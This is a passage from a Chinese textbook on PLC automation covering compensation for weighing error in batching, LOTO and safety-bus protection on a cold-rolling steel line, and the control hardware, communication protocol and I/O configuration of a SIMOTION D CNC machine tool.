,通过以上的补偿和控制措施 ,便能达到所需要的称 量精度 。若干次装料后形成称量误差累计等于最后一秤的称量积累误差 。 即 (Wj — Ws )=Wen (6 - 22) 因此 , 随着称量次数增加 ,其总的称量误差不会越积越多 。 通过不断优化料满提前量, 准确计算装料控制值 ,使每次的称量偏差降低到最低限度 ,对产生的误差及时予以补偿 ,从 而达到了自动称量补偿的目的 ,保证了连续称量的精度 。 2) 称量补偿算法的 PLC软件实现 。称量系统和槽下各设备的动作均由 PLC进行自动 控制 ,各称量漏斗的电子秤信号通过 PLC模拟量输入模板测量并换算 。称量过程按工艺顺 序可分为备料过程和放料过程 ,这里分别对这两个过程的程序设计进行描述 。 图 6-28 备料过程程序框图 •备料过程 。 备料过程开始的 条件 ,秤斗中料已放空且闸门已关 闭(放料过程结束)。 按照算法计算 本次计划备料重量 Wj 和料满控制 值 Wk , 然后发出启动给料设备命 令 , 给料设备工作 , 料仓中的原料 不断地装入秤斗 , 当秤斗重量达到 或超过料满控制值 Wk , 程序发出 “ 料满” 信号 , 停止给料设备工作, 延时数秒 , 等给料设备停止且余振 下料完毕 , 将此时的秤斗重量读入 秤斗满秤重量寄存器 , 结束备料过 程 。备料过程程序框图如图 6-28 所示 。 •放料过程 。备料过程已结束, 秤斗满秤 , 给料设备 已 停 止 工 作, 按照上料程序执行轮到该秤斗放料 ,程序发出开启秤斗闸门命令 ,驱动外部控制回路打开闸 门 ,秤斗中的原料通过闸门直接或经运料皮带装入上料小车中 ,秤斗重量连续下降 。 当秤斗 重量达到或低于料空控制值时(此控制值为一常数 , 由人工设定并输入 PLC寄存器), 关闭 秤斗闸门 。此时 ,秤斗已放空料 ,该秤斗重量即为空秤重量 ,然后按照前述算法计算下次满 提前量 Wt 、积累误差 We 和下次补偿量 Wp 。放料过程程序框图如图6-29所示 。 6.2.2 安全自动化技术在轧钢生产线的应用 6.2.2.1 轧钢生产工艺流程 在钢铁行业中 ,不论是冷轧生产线 ,还是整卷钢板的开卷 、剪裁 、再卷 ,这些生产过程 都会对操作人员造成伤害 。 以济南钢铁集团冷轧厂为例 ,热轧带钢作为原料 ,进入酸洗流水 线 。 由于热轧带钢经过轧制和冷却后在表面形成一层氧化铁皮 ,必须在冷轧之前进行酸洗以清除掉这层氧化铁膜 ,露出新鲜干净的带钢基体金属表面 。带钢经过酸洗线之后 , 就被传送至冷轧设备 , 被加工至客户所要的厚度 。然后 ,经过退火工序 ,令钢带内部晶体结构重组 , 使钢带的韧性得到增强 。最后经过平整流水线 , 消除带钢表面的凹凸不平现象后 ,得到成品 。整个生产过程中 , 冷轧流水线的工艺最为复杂 、安全性要求最高 。在轧制过程中 , 工作人员或调试人员需要在现场进行检测 、设定 、调试 、润滑 、清洗 、手动装载和故障排除等操作 。 在这些操作过程中 , 带钢的开卷 、再卷 、乳酸液喷射 、换辊 、钢卷小车移动 、X射线测厚, 以及轧制过程等都会对工作人员或调试人员造成碾压 、 碰撞 、 冲击 、切割 、缠绕 、拖拽 、灼伤 、辐射等伤害 。所以 , 必须采用安全保护和控制设备 , 来减少机器的风险 , 保护人和机器的安全 。 6.2.2.2 轧钢生产安全要求 在钢铁工业中 , 人员需要经常进入机械工作区域进行维修 、清晰和调试的工作 。 而钢铁工业中的机器控制功能非常复杂 ,在人员进入危险的机械工作区域时 , 为了保证机器不会意外启动 , 需要增加额外的 安 全 保 护 手 段 , 保 护 人 员 的 安 全 。LOTO功能 即 为 实 现 这 样 的 安 全 保 护 功 能 。 LOTO 全 称 为LockOut Tag On, 挂锁上牌 , LOTO接线图如图 6-30所示 。 LOTO控制操作步骤是: 1) 机器受控(SPS) 停止 。 2) 工作人员按下 PB-1、PB-2闭锁停止按钮 。 图 6-29 放料过程程序框图 3) 接收闭锁停止按钮信号的安全 PLC PSS闭锁输出回路 。PSS通过 LCK1和 LCK2安 全可靠切断输出回路, 保证机器停止 。 4) 如线路反馈信号无误, 现场绿色指示灯亮 ,表示人员可以进入危险区域 。 5) 工作人员赴现场实地确认机器停止 ,进入危险区域 。 6) 在闭锁过程中 , 一旦系统中出现任何故障, 安全控制装置 PSS立刻输出警示信号 (红色指示灯或蜂鸣装置)。 7) 如果按钮被解锁, 则会失去闭锁功能 ,机器准备下一次启动 。 6.2.2.3 轧钢生产安全自动化技术应用 现场分为 15个安全区域 。 在现场的各个操作区域 , 都装有紧急停止按钮 , 用以终止 机器异常的工作状况 ; 在安全区域 6和 7——— 轧机冷轧区域 , 采用卷帘门保护 , 防止高速 运转的工作轧辊和高速移动的钢带对人员造成伤害 ; 当进梁上钢卷移动的时 , 使用安全 地毯和安全门 , 以确保处于该危险区域的人员的安全 ; 模式转换开关和使能按钮的组合 使用 , 保证轧机在正确的生产流程下运行 ; 在工作区域 , 当有危险动作出现的时候 , 必 须可靠地发出声光报警 。 以上安全功能必须由可靠的安全系统进行控制 , 经过逻辑运算 后 , 执行安全的输出 , 控制电动机的运转或伺服系统 。 轧钢生产场所安全分区如图 6-31 所示 。 图 6-30 LOTO接线图 图 6-31 轧钢生产场所安全分区图 所有的安全输入输出点多达800个 , 并且分布分散在地下油库 、乳酸区 、轧机工作区 、 主控操作区域等 。显然 ,采用集中式的控制系统是不合适的 。所以 ,在该条生产线中 , 使用 了 Pilz的 SafetyBUS p安全总线系统 ,进行安全自动化数字控制 ,如图6-32所示 。 图 6-32 控制系统安全总线结构图 现场的安全信号直接进入安全远程I/O模块 。安全I/O模块通过 SafetyBUS p与主站 PSSSB3000安全 PLC进行安全数据交换 。安全 PLC在进行安全控制的同时 , 通过 Ether- net 通信扩展模块进入 Ethernet, 与控制液压 、乳酸部分的普通 PLC, 以及 HMI(人机界 面)、 TCS等工艺控制或诊断部分进行数据交换 。 系统中使用了安全功能块保证安全相关功 能编程的可靠性 。如 SB63紧急停止功能块 、SB66安全门功能块 、SB67输出反馈监控功能 块 , 以及针对 LOTO功能的 SB173和 SB174功能块 。 上述方案的优点是安全系统与非安全系统在物理上分离 。非安全系统负责整套冷轧线的 工艺控制 ,是一个动态的系统 。 安全系统 SafetyBUS p和 PSS负责现场所有的安全功能, 静态的运行其安全职责 , 一旦现场出现任何风险 , 立即可靠的切断输出 , 使得机器安全停 止 ;具有离散式控制 , 节省成本 , 降低故障率 , 诊断容易 (可以通过故障堆栈进行快速诊 断); 通过与 HMI的数据交换 , 可以直观判断; 可以通过程序在线诊断 , 安全可靠 , 达到 欧洲安全要求 。如果按照原先设计 ,该系统是一个高安全等级的系统 , 由于工程人员变更了 安全总线走线路径 ,使得总线长度加长 , 从而导致 SafetyBUS p中的时间检测参数需要降 低 。为了保证高的响应时间 ,在 SafetyBUS p现场总线中增加了路由器 。安全现场总线对接 线要求较高 。施工方必须按照要求接 SafetyBUS p安全总线的屏蔽线 ,否则可能导致整个系 统不稳定 。安全控制系统 PSS对外部元器件的接线要求极高 , 任何短路故障的出现都会导 致系统的停机 。如果现场接线的质量低 ,可能导致在调试初期的系统频繁停机; 如果整个安 全总线系统只设定了一个工作组群 ,则系统的可用性较低 。 6.3 PLC自动化在机器制造工业控制中的应用 6.3.1 PLC在机床运动控制中的应用 数控机床的总体结构如图6-33所示 ,展示了一套完整的三维数控系统接线示意图 , 这个图是用 PC机插入运动控制卡带动电动机运动的数控系统 , 体现了模块化思路 。各部分通 过标准接口互相联结 ,组成一个整体的运动控制系统 。 图 6-33 数控机床总体结构图 控制系统由 PC机(工控机)、 SIMOTION D(西门子运动控制 PLC)、 电源模块 、 电动 机模块 、 电动机 、光栅尺 、SMC30(传感器模块)、 分布式I/O ET200M(包括数字量模块 和模拟量模块)、 机械手 、主轴变频器 、高速主轴 , 以及多个传感器和限位开关组成 。 6.3.1.1 数控机床 PLC控制系统硬件 数控机床是由工控机 (上位机) 软件 、SIMOTION D(下位机) 软件 、硬件电路和机 械部分组成 。硬件电路负责机床的驱动 、各部分之间信息的传递以及系统的保护等 。 电气控 制系统的硬件部分对机床的整体性能具有决定性作用 。要完成整个系统的功能 ,需要控制 器 、数字I/O、模拟I/O、光栅尺 、工控机 、高速主轴 、机械手等多个部分的联合工作 , 电 气控制系统的硬件部分及功能实现主要有以下几个方面 。 (1) 工控机与 SIMOTION D通信 。 加工过程中会有大量的数据在上位机和 SIMOTION D之间进行交换 ,上位机和 SIMO- TION D之间的通信是通过 TCP/IP的方式 。工控机和 SIMOTION D上都有标准的 TCP/IP网 口 。 由于两者之间的通信没有经过路由器而是直通方式 ,所以工控机和 SIMOTION D之间用 交叉的网线进行连接 。排线标准符合 EIA/TIA布线标准中双绞线的线序568A的规定 。EIA/ TIA的568A标准为:绿白— 1;绿— 2;橙白— 3;蓝— 4;蓝白— 5;橙— 6;棕白— 7;棕— 8。 直通线(平行线) 就是按568A标准制作的网线 。而交叉线的线序在直通线的基础上做 了一点改变: 在线缆的一端把1和3对调 ,2和6对调; 即交叉线的一端保持原样 (直通线 序) 不变 ,在另一端把 1和 3对调 , 2和 6对调 。交叉线两端的线序如下: 一端 (不变), 另一端(对调两根), 橙白13绿白 ,橙26绿 ,绿白31橙白 ,蓝44蓝 ,蓝白55蓝白 ,绿62 橙 ,棕白77棕白 ,棕88棕 。 用计算机对通信接口进行配置 、IP地址设定分别如图6-34~图6-38所示 。 图 6-34 使用标准以太网接口 图 6-35 配置IE2通信接口 图 6-36 对 PC机的IP地址进行设定 图 6-37 IP地址进行设定结果 图 6-38 通信接口模块 (2) SIMOTION D运动控制系统 。 SIMOTION D运动控制系统的控制核心是 SIMOTION D, SIMOTION D与其他模块 (电动机模块 、SMC30) 之间的通信是通过 DRIVE-CLIQ实现的 。 DRIVE-CLIQ是西门子 的自定义接 口 , 只 要 把 SIMOTION D 上 的 DRIVE-CLIQ 接 口 和 电 动 机 模 块 的 DRIVE- CLIQ接口用标准的 DRIVE-CLIQ连接线插头插入即可 。 系统的电源模块选择的是不可调 节型, 所以没有 DRIVE-CLIQ接口 。SIMOTION D供电需要的直流24V电源是通过西门子 专用的 AC-DC模块 SITOP实现的 。 SIMOTION D系统每个模块的后部都有 24V 直流母 线, 在各模块拼装好后, 各个模块的24V直流母线可以连在一起, 所以为 SIMOTION D供 电的直流24V电源同时也满足其他模块对直流24V供电的需要 。 SIMOTION D控制系统的强电是直接加到电源模块上的, 这是为了子系统的稳定 , 也 是为了 SIMOTION D控制系统工作不对其他用电设备产生影响 。 电源模块通过外部滤波 器 、 电抗器及一系列保护措施从外部获得三相电能 ,并逆变成直流 ,通过前端的高压直流母 线传递给电动机模块 。 电动机模块通过动力线为电动机供电 , 同时通过 DRIVE-CLIQ获得 电动机的电子铭牌和工作参数上传给 SIMOTION D。 为了提高系统的可靠性 , 对每个模块 进行接地保护 。 由于 SIMOTION D控制系统外壳为金属制品, 与内部地线相连 , 在安装过 程中 SIMOTION D控制系统被安装在铁质控制柜上, SIMOTION D控制系统与控制柜可靠 紧密接触, 所以只对控制柜总体进行接地 。 一个标准的 SIMOTION D运动控制系统如图6-39所示 。 电源模块为西门子的 24V直 流电源模块 SITOP。 由于 SIMOTION D控制系统是标准化接口 、标准化连接 ,所以这里对 各模块的作用不进行介绍 。SITOP直流电源为系统提供稳定的 24V直流电源; 滤波器和电抗器消除线路的高频谐波 , 为系统提供保护; 传感器模块把 SIMOTION D不能识别的编码 器信号转换为它能够接受的信号 ,并通过 DRIVE-CLIQ接口传递给 SIMOTION D。 电动机 与电动机模块之间通过红色的动力线和绿色的 DRIVE-CLIQ连接 。 图 6-39 SIMOTION D运动控制系统 图 6-40 主轴的控制 (3) 高速主轴的控制 。 高速主 轴 的 转 速 高 达 160000r/min, 需要变频器输出约 2400Hz的频率来驱动 。 而 SIMOTION D系统能提供的最高频率 为500Hz, 不能满足对高速主轴的驱动, 所以选 择 台 达 VFD-V 系 列 高 速 变 频 器 。 主轴的控制如图6-40所示 。 对台达变频器的输出频率 , 可以通过 串行485接口用 MODBUS协议进行控制, 但是 SIMOTION D本身不具有能够自由 的串行485接口 。 考虑到成本以及性能问题 ,SIMOTION D通过模拟方式对台达变频器进行控制 。SIMOTION D本身不具有模拟量 I/O口 , 系统通过外扩 SM334方式实现 , 即通过 SM334的 AO点输出指定的电压到台达变 频器的 AVI端子 , 通过对台达变频器的控制实现对主轴转速的控制 。SM334输出 0~10V 之间电压到台达变频器来指定变频器的输出频率 。 台达变频器的 U、V、W 接到主轴的 U、 V、W 即可实现能量的传递 ,从而实现对主轴速度的控制 。为了保护主轴 , 台达变频器安装 刹车电阻以使主轴可以较快的停止 。为了监控台达变频器的工作状态 , 台达变频器的多机能 接点输出利用 RA、MRA、M01、M02这四个信号来获得台达变频器的状态 。 SIMOTION D通过读取 RA、MRA、M01, M02分别知道台达变频器的故障 、运转中 、频率达到和变 频器启动完成信息 。 变频器与主轴只有 U、V、W 三根动力线连接 , 接线过程中输入变频器电源 R、S、T 并无相序分别 ,可任意连接使用 ,不可将交流电源连接至变频器出力侧端子 U、V、W 。接 地端子 E以第三种接地方式接地(接地阻抗 100S2以下)。 若将变频器输出端子 U、V、W相对连接至电动机 U、V、W 端子 ,则变频器数字控制面板上正转 (FWD) 指示灯亮 , 则 表示变频器执行正转 ;若逆转(REV) 指示灯亮 , 则表示变频器执行反转 。若无法确定变 频器输出端子 U、V、W 连接至电动机 U、V、W 端子是否一对一连接 ,如果变频器执行正 转时 , 电动机为反转方向 , 只要将电机 U、V、W 端子中任意两条对调即可 。 系统包含4根主轴 , 为了节约成本采用一台变频器同时驱动4根主轴 , 为了节约能量所 以加工过程中停止不用的主轴 ,采用继电器来通断每根主轴的供电线路来实现对每根主轴启 停的控制 。 由于变频器同时驱动 4根主轴所以变频器不能够对 4根主轴进行可靠的过载保 护 , 因此为每根主轴配一个热继电器进行保护 。 为了更好对主轴进行保护 , 每根主轴内的 NTC温度保护系统(温变电阻) 接入系统的模拟量输入点 , 通过对温变电阻的测量来获得 主轴内部的温度 。 当检测到温变电阻达到一定值后立即停止主轴向上位机报警 。 (4) 扩展I/O。 由于 SIMOTION D本身的I/O数量较少 , 为了处理更多的外部事件就要扩展I/O。SI- MOTION D的I/O扩展可以采用 DRIVE-CLIQ连接 TM31或者用 PROFIBUS扩展分布式 I/O方式 。ET200M 是西门子全集成系统中常用模块 ,所以价格较低而且可以大量扩展 。 出 于性价比考虑采用较为常用的 ET200M 分布式I/O。ET200M 是由一个IM153接口模块外 加数字量模块 、模拟量模块和通信模块等功能模块组成 。 IM153本身具有 CPU , 可以独立 处理外部事件 ,然后把处理好的结果传递给 SIMOTION D,这样大量节省了 SIMOTION D 的处理时间 。 系统通过IM153外带 SM323(16DI/16D0) 数字量模块和 SM334(4AI/2A0) 模拟量模块组成扩展I/O模块 ,如图6-41所示 。 1) 数字量模块 SM323。数字量模块的 数字量输入功能是把外部开关量信号采集 进来 ,经过处理后由 IM153经 DP总线传 递给 SIMOTION D, 数字量输出则可以驱 动小型的执行元件 , 例如电磁阀 、继电器 。 SM323主要是处理外部开关量传感器和限 图 6-41 扩展I/O模块 位开关的信号 , 为 SIMOTION D提供机床的状态 。其接线如图 6-42所示 , 其中左侧为数 字量输入 ,20号端子(1M) 接 SITOP地 ,其他端子通过外部开关接 SITOP正 。右边为数 字量输出 , 30、40号端子接 SITOP地 , 21、31号端子接 SITOP正 ,其他输出端子可以接 电流较小的电磁阀或者继电器 。 系统的数字量输入包括限位开关 、接近开关 、温度传感器 、 压力传感器等开关量信号 。数字量输出主要是对电磁阀和继电器进行控制 ,实现例如对机械 手 、主轴气爪和主轴的选择的控制 。 SM334接线图如图 6-43所示 , SM334与传感器的连 接如图6-44所示 ,SM323与电磁阀接线如图 6-45所示 , SM323干节点输入接线如图 6- 46所示 。 2) 模拟量模块 SM334。SIMOTION D本身不具有模拟量I/O,所以通过 IM153扩展 模拟量模块 SM334来处理模拟量 。SIMOTION D对主轴变频器的控制采用模拟量方式 , 即 通过 SM334的模拟量输出点来实现; 而主轴电动机温度的采集也是通过 SM334。SM334包 括4个 AI和2个 AO,其模拟量输入为 CHO、CH1、CH2、CH3,可以对电压(0~10V)、 电阻(10kΩ) 和温度 (Pt100) 进行测量 。测量时可以把传感器的信号线通过对应通道的 M * +和 M* — 接入 SM334进行 。 图 6-42 SM323接线图 图 6-43 SM334接线图 (5) 轴的回零 。 回参考点模式 (回零模式) 只有使用增 量编 码 器 时 需 要 ( 旋 转 编 码 器 Reserver、 正/余弦编码器 Sin/Cos或脉冲编码器), 因 每次上电时增量编码器与轴的机械位置之间 没有任何关系 。 因此轴都必须被移至预先定 义好的零点位置 , 即执行 Homing功能 。 当 使用绝对编码器 (Absolute) 时每次上电不 需重新回零 。 图 6-45 SM323与电磁阀接线图 图 6-44 SM334与传感器的连接 图 6-46 SM323干节点输入接线图 回零分为主动回零和被动回零: 1) 主动回零(Active Homing)。 主动回零方式只适用于增量编码器 , 绝对值编码器只 需在初始化阶段进行一次编码器校准 , 以后不必做回零 。 主动回零有三种方式: ①仅用编码 器零标志位(Encoder Zero Mark) 回零; ②仅用外部零标志 (External Zero Mark) 回零; ③使用接近开关+编码器零标志位(Homing output cam+Zero Mark) 回零 。 2) 被动回零 (Passive Homing)。 Passive Homing又称为 Homing on the fly(被动回 零), 被动回零用于轴工作与任意定位状态时动态修改当前位置值为零 (如在点动时 、执行 程序步时 、执行 MDI时), 执行被动回零后并不影响轴当前的运行状态 ,轴并不是真正的走 到零点而只是其当前位置值被置为0,重新开始计算位置 。 系统的 X、Y、Z轴用的是都是增量编码器 , 每次开机必须回零 , 各轴的回零采用主动 回零的接近开关 +编码器零标志位 (Homing output cam+Zero Mark) 回零方式 。选择这 种方式是因为为了保证回零精度要求工作台以较低速度通过编码器零点 ,但是如果回零时刻 工作台离零点很远 ,要以较低速度回到零点进行回零会浪费大量时间 ,所以系统采用接近开 关+编码器零标志位的回零方式 。各轴分别安装接近开关 ,在回零过程中工作台的铁磁性物 质经过接近开关并被接近开关感应到后 ,Z轴降低速度寻找编码器零标志位 , 在收到编码器零标志位后回零结束 。接近开关的相对安装位置 和回零过程如图6-47所示 。 回零原理及参数设 定如图6-48所示 。 (6) 安全限位 。 SIMOTION D中的限位包括软限位和硬限 位 ,这里只讲硬限位 。为了使工作台在安全区工 作不越位到不期望达到的地方为各轴安装限位开 图 6-48 回零原理及参数设定 关 。其中 X、Y轴为两侧限位, 用接触式限位开关实现, 当工作台移动到限位开关时 , 工作 台上的挡片会触发限位开关, 导致工作台被急停 。 4个 Z轴中每根轴只在下部安装限位开 关, 上部不安装限位开关, Z轴的限位通过接近开关实现 。 当 Z轴向下运动到临界位置时, Z轴上的金属挡片会触发接近开关对 Z轴限位 。 X、Y、Z轴处限位工作台被急停时 , 工作 台只能向相反的方向运动 。工作台和主轴的限位示意如图6-49所示 。 图 6-49 工作台和主轴的限位示意图 (7) 机械传动比 。 由于伺服电动机是通过滚珠丝杠驱动工作台工作的 ,所以组态过程中必须告诉系统电动 机到工作台的传动比 , 因为程序中是对工作台进行控制 , 而传感器安装在电动机上 ,所以为 了获得工作台的准确位置必须知道电动机到工作台的传动比 。 电动机到工作台的硬件连接是 电动机连接高精度滚珠丝杠带动工作台运动 。滚珠丝杠选择的螺距为 10mm 。 为了适应不同 情况 ,在 SCOUT的组态界面中可以对不同的外部情况进行设置, 包括电动机侧传动比 、负 载侧传动比 、滚珠丝杠螺距及编码器特性等多种参数 。 (8) 机械手换刀 。 为了提高加工效率, 系统采用机械手自动换刀方式 。机械手为气动型有两个自由度 , 向 上伸出机械臂和刀具加紧 。分别通过对电磁阀的开关控制实现对机械手气缸进气控制 , 使机 械手可以自由地伸出 、收回 、加紧刀具和松开刀具 。为了刀具被正确的放回刀库 ,机械手的 伸出长度可以由 SIMOTION D控制 ,实现方式为: 机械手的运动活塞带有磁性 , 在气缸外 壁安装磁性感应开关, 当机械手运动到某一位置时感应开关接通 , SIMOTION D收到信号 后立即关闭机械手的进气路达到机械手限位目的 。机械手换刀的流程为: 1) 机械手运动到主轴正下端打开机械爪并伸出机械臂 , 此时主轴上的刀具下端的加紧 位置已经处于机械爪的可加紧范围内 。 2) 主轴加紧刀具的机械爪松开 。 3) 机械手的机械爪加紧刀具然后机械臂收回 , 机械手运动到刀库下端伸出机械臂 , 刀 具被插入刀库同时机械手的机械爪松开 ,机械臂收回 。 4) 机械手运动到目标刀具下部打开机械爪伸出机械臂 , 再加紧机械爪 , 加紧刀具 , 收 回机械臂 ,完成从刀库取刀动作 。 5) 机械手运动到主轴下部 ,伸出机械臂 , 主轴的机械爪夹紧刀具 , 机械手的机械爪松 开刀具 ,完成送刀动作 。为了进行精确加工 ,换完刀后主轴运动到深度检测传感器进行深度 检测 ,如果不符合要求再用机械手进行刀位校正 。机械手换刀示意图如图6-50所示 。 (9) 系统强电配电 。 系统的强电配电对系统的稳定性和安全性至关重要 。考虑到系统在工作过程中出现失控的运动设置急停按钮 , 对整个系统及人身安全进行保护 。采用的急停按钮为常闭型 , 即如果线路断开则整个系统可以立即断电起到保护作用 。 系统的强电配电对 SIMOTION D运动控制系统加入电抗器和滤波器来滤掉高频谐波的干扰 。 为了防止操作者以外的人触电或者由于电线 图 6-50 机械手换刀示意图的破损导致机体漏电 , 在总开关处安装漏电保护器 。为了对主轴电动机进行保护 , 为每个主轴安装热继电器 。SIMOTION D对电源 模块的上电和使能有时序要求 ,对电源模块的强电和使能信号分时上电 ,通过程序控制继电 器进行顺序控制 。 由于接触器的控制电流较大 ,所以采用 PLC数字量I/O控制中间继电器间 接实现对电源的控制 。 电源模块采用快速熔断器进行保护 , 总电源开关为带漏电保护器的空 气开关 。 同时24V电源也进行过载保护 ,SIMOTION D与电磁阀等传感器采用同一电源供 电 ,SIMOTION D和电磁阀分开配备熔丝保护 。 为了使系统具有可靠性 , 系统全部接地, 同时24V负极也接地 。 系统强电配电局部示意图如图6-51所示 。 (10) 断刀检测 。 断刀检测采用基恩仕的光纤传感器 ,此传感器为 OC门形式 , 三根接入线可以直接接入 24V电源 ,信号线可以通过电阻接入 24V电源构成电平输出 , 为 ET200M 提供电平信号 。 光纤传感器的一根光纤输出一束红外线 ,另一根光纤接收这束红外线 ,光纤传感器通过检测 光束是否被遮挡来判断刀具是否失效 。检测前 , 主轴带动一个标准刀具运动到光束处进行检 测 , 当光纤传感器出现电平变化时记录下Z轴位置 , 因为光束位置确定所以可以间接确定刀 具长度 。检测时 , 主轴带动刀具运动到光束上方并且下降一定距离 (开始检测时的一记录 值) 如果接收光纤没能够接收到红外线 ,说明红外光束被刀具挡住 , 刀具完好; 如果接收光 纤可以正常接收 ,说明刀具失效 。光纤传感器原理如图6-52所示 。 断刀检测可以防止漏孔 现象 ,在批量加工过程中每加工一个孔 ,要对刀具进行一次检测 ,如果刀具失效则立即机械 手换刀 。 图 6-51 系统强电配电局部示意图 图 6-52 光纤传感器原理图 (11) 深度检测 。 加工过程中 ,有时会遇到打盲孔的要求 ,这就需要钻头的安装深度具有较高的精度 。 为 此选择 NC-PCB作为深度检测传感器 。NC-PCB是一种数字量传感器, 正式开始工作前需要 拿一个标准刀具对刀 。对刀就是拿一个标准刀具放在合适的位置 , 调节 NC-PCB直到信号 线输出一个高电平, 在工作过程中只有主轴运动到 NC-PCB上方, 下降一定深度, 如果 NC- PCB能够检测到刀具存在说明刀具安装正确, 如果 NC-PCB不能够检测到刀具, 说明刀具 安装倾斜或者深度不合适 ,需要重新安装 。深度检测原理如图6-53所示 。 (12) 信号接口板 。 机床中有许多传感器, 这些传感器的接口各不相同 ,有的需要上拉电阻, 有的需要光耦隔离 ,有的是5V供电 ,需要对这些传感器的接口信号进行处理 ,把标准的24V电平信号传 递给 ET200M(PROFIBUS-DP现场总线连接分布式I/O模块) 的I/O使用 。为了处理这些 信号 ,设计一块信号接口板作为传感器和 ET200M 的通信桥梁 。信号板为所有信号需要处 理的传感器提供接口 , 为接近开关 、断刀检测传感器 、深度检测传感器 、压力传感器和台达 变频器的 OC门提供上拉电阻 。 上拉电阻要求能够输出传感器输出的信号且满足其电流要 求 。信号板也为 NCPCB提供 5V 电源 , 把 ET200M 的 24V 控制信号转换为 5V 输入给 NCPCB,把 NCPCB输出的5V信号转换为24V信号传递给 ET200M 。信号接口板用把24V 电源通过 LM7805转化为5V, 在 5V和 24V之间的转化通过芯片 TLP521-2进行 。信号接 口板示意如图6-54所示 。 6.3.1.2 数控机床 PLC控制系统软件 SIMOTION D上的程序负责从上位机接收数据并控制执行部件工作和检测机床状态的 任务 。 主要包括上位机与 SIMOTION D之间的通信 、扩展I/O的组态 、轴的组态 、 自动换 刀 、数据存储 、点动 、批量加工和后台任务 。 (1) 系统总体执行逻辑的设计 。 系统的软件任务是接收上位机命令 、驱动电动机进行加工 、实时监控机床的工作状态并 及时上传给上位机 。为了机床可靠工作 , 每次上电开机 SIMOTION D会进行自检 , 自检成 功对机床进行开机检查 ,所有参数均正常或者个别参数超出规定范围但是不会产生严重故障 (把异常参数上传给上位机), 则进入开机归位状态 。 开机归位状态时各轴以主动方式回零 后 ,X、Y轴以设定速度回到泊车位 , 同时 SIMOTION D向上位机发送建立连接请求 , 两 者连接成功后进入等待命令状态 。在收到上位机命令后解析命令转入相应的处理程序 。 SI- MOTION D具有可执行多个线程的操作系统 ,所以在执行命令的同时可以对机床进行检测, 包括电机温度 、压脚气压 、刀具磨损 、变频器信号等外部事件 。 (2) 建立 TCP/IP连接 。 上位机与下位机通信是通过 TCP/IP协议进行的 。 考虑到特殊情况 (例如 , 不能确定 每次用户先打开上位机还是下位机 , 或者工作过程中一方突然出现故障关机), 上位机与 下位机都应该具有通信中断后自动建立连接功能 。 系统采用下位机在开机或者检测到通 信中断后自动进入建立通信连接状态 , 即下位机通过 UDP协议循环向上位机发送建立连 接请求 。 如果上位机已经开机 , 收到建立连接请求后作为客户端与 SIMOTION D建立 一 个 SIMOTION D作为服务器的连接 , 连接成功后向下位机发送连接成功信号 , 此时 SIM- OTION D作为客户端与作为服务器的上位机建立连接 , 连接成功后也向上位机发送连接 建立成功信号 。 当两个连接全部成功建立进入等待命令状态 。 SIMOTION D与上位机建 立连接如图 6-55所示 。 建立连接的 MCC程序如图6-56所示 。 在机床工作过程中有上位机与 SIMOTION D之间有大量信息需要交换 , 为子系统的 稳定性 , 可靠性需要设定一种合适的信息帧格式 。 这里信息帧的格式为 [数据包大小] [功能][数据 1] [数据 2] … [数据 n] [校验码]。 数据包大小表示了此数据包的字节 个数 , 对 SIMOTION D的数据接收有重要作用 , 功能码表示此条信息的要执行的命令 为一个字节 , 数据为数据包的数据内容 , 检验码采用常用的 CRC校验 , 下面给出一个 示例 。 图 6-53 深度检测原理图 图 6-54 信号接口板示意图 图6-55 SIMOTION D与上位机建立连接 图 6-56 建立连接的 MCC程序 点动命令数据包的格式为: [数据包大小][功能码][X轴速度][Y轴速度][Z1轴速度][Z2轴速度][Z3轴速度][Z4轴速度] 例如:[0053][01][10.5][0][0][0][0][0] 1)[数据包大小]:int型,占 4个字节,在本数据包中总字节数是 53个(4+1+6×8=53) 2)[功能码]:byte型,占 1个字节,规定功能码为 0l 3)[X轴速度]:double型,占 8个字节,X轴的速度可以是正实数 、负实数,或是零 。 4)[Y轴速度]:double型,占 8个字节,Y轴的速度可以是正实数 、负实数,或是零 。 5)[Z1轴速度]:double型,占 8个字节,Z1轴的速度可以是正实数 、负实数,或是零 。 6)[Z2轴速度]:double型,占 8个字节,Z2轴的速度量可以是正实数 、负实数,或是零 。 7)[Z3轴速度]:double型,占 8个字节,Z3轴的速度可以是正实数 、负实数,或是零 。 8)[Z4轴速度]:double型,占 8个字节,Z4 轴的速度可以是正实数 、负实数,或是零 。 为了确保通信的可靠性 , 系统上下位机通信采用应答方式 , 当下位机收到点动数据包后 回复上位机数据包格式如下: 下位机成功收到数据包,回复给上位机 。 [数据包大小][两个大写字母][功能码] 例如:[0007][0K][01] 1)[数据包大小]:rot型,占 4个字节,在本数据包中总字节数是 7个(4+2+1=7)。 2)[两个大写字母]:byte型,占 2个字节,规定用大写字母“0K”表示数据包成功接收 。 3)[功能码]:char型,占 1个字节,规定功能码为 01。 下位机接收数据包出错,回复给上位机 。 [数据包大小][两个大写字母][功能码] 例如:[07][ER][01] 1)[数据包大小]:rot型,占 4个字节,在本数据包中,总字节数是 7个(4+2+1=7) 2)[两个大写字母]:char型,占 2个字节,规定用大写字母“ER”表示接收数据包出错 3)[功能码]:byte型,占 1个字节,规定功能码为 01。 下位机在成功接收到点动数据包后进入点动程序 。 (3) 扩展I/O的组态 。 由于 SIMOTION D 本身带有的 I/O 很少 (8DI, 8DI/DO), 所以扩展外部 I/O, 由 ET200M来实现 。ET200M 通过 Profibus与 SIMOTION D通信 ,采用标准的 Profibus电缆进行连接 , SIMO- TION D作为主站 ,ET200M 作为从站 。 由于只有一个 Profibus从站 ,Profibus电缆两侧的电阻打开 。组态时 ET200M 的地址是通过 IM153上的拨码开关完成的, 这里IM153地址为3。ET200M 的地址组态如图 6-57 所示 。 接口模块选择 IM153-1, 通过背板总线扩展 2个 SM323和 SM334I/O模块 。ET200M 的操作非常简单, 只要在组态时为每个模块分配地址空间 , 在程序中可 以对地址直接寻址使用 。 在组态界面中为两个 SM323 分配地址空间为 DI68~DI69, DI70~DI71, DO68~ 图 6-57 ET200M的地址组态 DO69,DO70~DO71; 为 SM334分配地址空间为 AI380~AI387, AO380~AO383, 见表 6-10。 表 6-10 扩 展 模 块 地 址 表 模块名称 特点 输入地址 输出地址 SM323 16DI/16DO 68、 69 68、 69 SM323 16DI/16DO 70、 71 70、 71 SM334 4AI/2AO 380、 387 380、 383 (4) 轴的组态 。 因为后续的程序是对硬件的操作 , 所以在编程之前先要对整个系统进行组态 。组态包 括驱动器的组态和轴的组态 。 由于篇幅有限 , 这里只对组态过程中比较重要的地方进行 说明 。 1) 启动 Scout软 件 , 使 